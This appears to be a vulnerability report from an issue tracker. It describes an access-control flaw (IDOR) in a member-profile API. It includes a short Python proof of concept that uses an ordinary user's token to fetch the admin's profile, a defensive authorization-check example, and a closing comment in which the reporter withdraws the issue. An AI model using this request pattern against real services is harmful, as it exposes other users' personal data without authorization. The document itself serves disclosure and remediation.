## Summary
An **IDOR (Insecure Direct Object Reference)** vulnerability exists in the endpoint `/api/v1/members/{mb_id}` which allows **any authenticated user** to retrieve **arbitrary user profile information**, including administrator accounts, by simply modifying the `mb_id` path parameter.
This constitutes a serious **vertical privilege escalation (CWE-269, CWE-284)** and **sensitive information disclosure (CWE-200)**.
## Step-by-Step Reproduction (PoC)
### 1. Register and log in as a regular user to obtain JWT access token
```python
import requests

# Step 1: authenticate as an ordinary (non-admin) member and capture the tokens
url = "http://localhost:8000/api/v1/token"
credentials = {
    "username": "test",  # username of the regular account
    "password": "1234"
}
res = requests.post(url, data=credentials)
if res.status_code == 200:
    token_data = res.json()
    access_token = token_data.get("access_token")
    refresh_token = token_data.get("refresh_token")
    print("[+] Access Token:", access_token)
    print("[+] Refresh Token:", refresh_token)
else:
    print(f"[!] 로그인 실패: {res.status_code}")
    print(res.text)
```
### 2. Use that regular user's token to access admin profile
```python
import requests

# Step 2: reuse the regular user's token to request another member's profile
access_token = "<access token from step 1>"
target_mb_id = "admin"
url = f"http://localhost:8000/api/v1/members/{target_mb_id}"
headers = {
    "Authorization": f"Bearer {access_token}"
}
res = requests.get(url, headers=headers)
print(f"[+] Status: {res.status_code}")
print(res.text)
```
### Vulnerable Response:
```json
{"mb_id":"admin","mb_nick":"최고관리자","mb_email":"admin@your-domain.com","mb_point":100,"mb_profile":"","mb_icon_path":"/static/img/no_profile.gif","mb_image_path":"/static/img/no_profile.gif","mb_1":"","mb_2":"","mb_3":"","mb_4":"","mb_5":"","mb_6":"","mb_7":"","mb_8":"","mb_9":"","mb_10":""}
```
## Impact
* Any authenticated user can access **any other user's profile**, including admin.
* Disclosed data includes **email, nickname, points**, and potentially more.
* Reflects **improper access control** and **vertical privilege escalation**.
## CWE References
* **CWE-269**: Improper Privilege Management
* **CWE-284**: Improper Access Control
* **CWE-200**: Exposure of Sensitive Information to an Unauthorized Actor
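The missing piece in the report is an object-level authorization check on the profile endpoint. The following is an added example written for this page, not code from the project the report concerns: it models the decision as plain Python (no FastAPI dependency) and assumes an `mb_level` field with `ADMIN_LEVEL = 10` marking administrators, that `mb_open` is the member's profile-visibility flag named in the issue comment, and that e-mail and points are private unless the requester owns the profile or is an admin.

```python
from dataclasses import dataclass
from typing import Optional

ADMIN_LEVEL = 10  # assumption: the level that marks an administrator

# Constructed, minimal member record. Field names follow the report's response
# (mb_id, mb_nick, mb_email, mb_point) plus mb_open, the profile-visibility
# flag named in the issue comment; mb_level is an assumption for this example.
@dataclass
class Member:
    mb_id: str
    mb_nick: str
    mb_email: str
    mb_point: int
    mb_open: bool = False  # member opted to make the profile public
    mb_level: int = 1

# Fields anyone may see on an opened profile vs. fields kept to owner/admin.
PUBLIC_FIELDS = ("mb_id", "mb_nick")
PRIVATE_FIELDS = ("mb_email", "mb_point")

def is_owner_or_admin(requester: Member, target: Member) -> bool:
    return requester.mb_id == target.mb_id or requester.mb_level >= ADMIN_LEVEL

def can_view_profile(requester: Member, target: Member) -> bool:
    """Object-level authorization for GET /api/v1/members/{mb_id}:
    the owner and administrators always may; others only if mb_open."""
    return is_owner_or_admin(requester, target) or target.mb_open

def profile_view(requester: Member, target: Member) -> Optional[dict]:
    """Fields the requester may receive, or None (the handler should 403)."""
    if not can_view_profile(requester, target):
        return None
    data = {f: getattr(target, f) for f in PUBLIC_FIELDS}
    if is_owner_or_admin(requester, target):
        data.update({f: getattr(target, f) for f in PRIVATE_FIELDS})
    return data

# Constructed sample records; the admin row mirrors the report's response.
ADMIN = Member("admin", "최고관리자", "admin@your-domain.com", 100, mb_level=ADMIN_LEVEL)
TESTER = Member("test", "tester", "test@example.com", 0)
OPEN_MEMBER = Member("bob", "bob", "bob@example.com", 5, mb_open=True)

if __name__ == "__main__":
    print(profile_view(TESTER, ADMIN))        # None -> 403, closes the IDOR
    print(profile_view(TESTER, OPEN_MEMBER))  # public fields only
    print(profile_view(ADMIN, TESTER))        # full record for an admin
```

In a real handler the check runs after token validation and before the database row is serialized, so a denied request never touches the private fields.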
1 comment
oxqnd
3 months ago
I reported this issue without checking the mb_open (profile visibility) setting for the account.
I apologize for the confusion, and I will close this issue.